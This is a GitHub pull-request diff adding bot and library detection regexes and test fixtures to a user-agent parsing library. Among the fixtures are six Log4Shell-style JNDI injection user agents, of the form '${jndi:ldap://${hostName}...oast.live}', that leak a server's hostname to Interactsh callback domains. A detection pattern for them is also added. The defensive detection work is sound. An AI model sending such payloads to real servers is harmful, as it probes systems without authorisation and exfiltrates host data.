Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adds detection for various bots #7612

Merged
merged 15 commits into from
Mar 11, 2024
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 6 additions & 0 deletions Tests/Parser/Client/fixtures/library.yml
Original file line number Diff line number Diff line change
Expand Up @@ -641,3 +641,9 @@
type: library
name: Kiwi TCMS API
version: 12.7
-
user_agent: electron-fetch/1.0 electron (+https://github.com/arantes555/electron-fetch)
client:
type: library
name: Electron Fetch
version: "1.0"
146 changes: 143 additions & 3 deletions Tests/fixtures/bots.yml
Original file line number Diff line number Diff line change
Expand Up @@ -1331,7 +1331,7 @@
-
user_agent: Googlebot-News (2.3.3, ruby 1.9.3 (2013-11-22))
bot:
name: Googlebot
name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
Expand Down Expand Up @@ -4203,8 +4203,8 @@
url: https://github.com/projectdiscovery/httpx
category: Crawler
producer:
name: ""
url: ""
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: 'Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: [email protected]'
bot:
Expand Down Expand Up @@ -7205,3 +7205,143 @@
producer:
name: Open Technologies Bulgaria, Ltd.
url: https://kiwitcms.org
-
user_agent: Googlebot-News
bot:
name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
name: Google Inc.
url: https://www.google.com/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.live}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.online}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.site}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.fun}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.me}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 webtru_crawler
bot:
name: webtru
category: Crawler
url: https://webtru.io/
producer:
name: DataSign Inc.
url: https://datasign.jp/
-
user_agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko; compatible; URLSuMaBot / 1.0; +https://www.urlsuma.de/bot.aspx) Chrome / 70.0.3538.77 Safari / 537.36
bot:
name: URLSuMaBot
category: Crawler
url: https://www.urlsuma.de/
-
user_agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) 360JK yunjiankong 427691
bot:
name: 360JK
category: Site Monitor
url: http://jk.cloud.360.cn/
producer:
name: 360 Security Technology Inc.
url: https://www.360.cn/
-
user_agent: LinkChain
bot:
name: Generic Bot
-
user_agent: Morfeus Fucking Scanner
bot:
name: Generic Bot
-
user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 UCSBNetworkMeasurement/2023 (contact; stijn; at; ucsb.edu;)
bot:
name: UCSB Network Measurement
category: Crawler
url: https://www.it.ucsb.edu/
producer:
name: University of California, Santa Barbara
url: https://www.it.ucsb.edu/
-
user_agent: Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066
bot:
name: Plesk Screenshot Service
category: Service Agent
url: https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service
producer:
name: Plesk International GmbH
url: https://www.plesk.com/
-
user_agent: Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955)
bot:
name: Yahoo! Japan ASR
category: Crawler
url: https://support.yahoo-net.jp/PccSearch/s/article/H000007955
producer:
name: Yahoo! Japan Corp.
url: https://www.yahoo.co.jp/
-
user_agent: Who.is Bot
bot:
name: Who.is Bot
category: Crawler
url: https://who.is/
-
user_agent: Mozilla/5.0 (compatible; WireReaderBot/1.0; +https://wirereader.app)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
-
user_agent: WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
87 changes: 83 additions & 4 deletions regexes/bots.yml
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,11 @@
# @license http://www.gnu.org/licenses/lgpl.html LGPL v3 or later
###############

- regex: 'WireReaderBot(?:/([\d+.]+))?'
name: 'WireReaderBot'
category: 'Feed Fetcher'
url: 'https://wirereader.app/'

- regex: 'monitoring360bot'
name: '360 Monitoring'
category: 'Site Monitor'
Expand Down Expand Up @@ -768,6 +773,14 @@
name: 'Visual Meta'
url: 'https://www.shopalike.cz/'

- regex: 'Googlebot-News'
name: 'Googlebot News'
category: 'Search bot'
url: 'https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers'
producer:
name: 'Google Inc.'
url: 'https://www.google.com/'

- regex: 'Adwords-(?:DisplayAds|Express|Instant)|Google Web Preview|Google[ -]Publisher[ -]Plugin|Google-(?:Ads-Conversions|Ads-Qualify|Adwords|AMPHTML|Assess|Extended|HotelAdsVerifier|InspectionTool|Lens|PageRenderer|Read-Aloud|Safety|Shopping-Quality|Site-Verification|speakr|Stale-Content-Probe|Test|Youtube-Links)|(?:AdsBot|APIs|DuplexWeb|Feedfetcher|Mediapartners)-Google(?:-Mobile)?|Google(?:AdSenseInfeed|AssociationService|bot|Other|Prober|Producer)|Google.*/\+/web/snippet'
name: 'Googlebot'
category: 'Search bot'
Expand Down Expand Up @@ -1912,6 +1925,22 @@
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Y!J-ASR'
name: 'Yahoo! Japan ASR'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: '^Y!J'
name: 'Yahoo! Japan'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Yandex(?:(?:\.Gazeta |Accessibility|Mobile|MobileScreenShot|RenderResources|Screenshot|Sprav)?Bot|(?:AdNet|Antivirus|Blogs|Calendar|Catalog|Direct|Favicons|ForDomain|ImageResizer|Images|Market|Media|Metrika|News|OntoDB(?:API)?|Pagechecker|Partner|RCA|SearchShop|(?:News|Site)links|Tracker|Turbo|Userproxy|Verticals|Vertis|Video|Webmaster))|YaDirectFetcher'
name: 'Yandex Bot'
category: 'Search bot'
Expand Down Expand Up @@ -2576,8 +2605,16 @@
url: 'https://github.com/projectdiscovery/httpx'
category: 'Crawler'
producer:
name: ''
url: ''
name: 'ProjectDiscovery, Inc.'
url: 'https://projectdiscovery.io/'

- regex: '.*\.oast\.'
name: 'Interactsh'
category: 'Security Checker'
url: 'https://github.com/projectdiscovery/interactsh'
producer:
name: 'ProjectDiscovery, Inc.'
url: 'https://projectdiscovery.io/'

- regex: 'scaninfo@(?:expanseinc|paloaltonetworks)\.com'
name: 'Expanse'
Expand Down Expand Up @@ -4237,10 +4274,52 @@
name: 'Open Technologies Bulgaria, Ltd.'
url: 'https://kiwitcms.org'

- regex: 'webtru_crawler'
name: 'webtru'
category: 'Crawler'
url: 'https://webtru.io/'
producer:
name: 'DataSign Inc.'
url: 'https://datasign.jp/'

- regex: 'URLSuMaBot'
name: 'URLSuMaBot'
category: 'Crawler'
url: 'https://www.urlsuma.de/'

- regex: '360JK yunjiankong'
name: '360JK'
category: 'Site Monitor'
url: 'http://jk.cloud.360.cn/'
producer:
name: '360 Security Technology Inc.'
url: 'https://www.360.cn/'

- regex: 'UCSBNetworkMeasurement'
name: 'UCSB Network Measurement'
category: 'Crawler'
url: 'https://www.it.ucsb.edu/'
producer:
name: 'University of California, Santa Barbara'
url: 'https://www.it.ucsb.edu/'

- regex: 'Plesk screenshot bot'
name: 'Plesk Screenshot Service'
category: 'Service Agent'
url: 'https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service'
producer:
name: 'Plesk International GmbH'
url: 'https://www.plesk.com/'

- regex: 'Who.is'
name: 'Who.is Bot'
category: 'Crawler'
url: 'https://who.is/'

# Generic bots
- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
name: 'Generic Bot'

# Generic detections
- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scanner|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
name: 'Generic Bot'
5 changes: 5 additions & 0 deletions regexes/client/libraries.yml
Original file line number Diff line number Diff line change
Expand Up @@ -250,6 +250,11 @@
version: '$1'
url: 'https://github.com/node-fetch/node-fetch'

- regex: 'electron-fetch/?(\d+[\.\d]+)?'
name: 'Electron Fetch'
version: '$1'
url: 'https://github.com/arantes555/electron-fetch'

- regex: 'ReactorNetty/(\d+[\.\d]+)'
name: 'ReactorNetty'
version: '$1'
Expand Down
Loading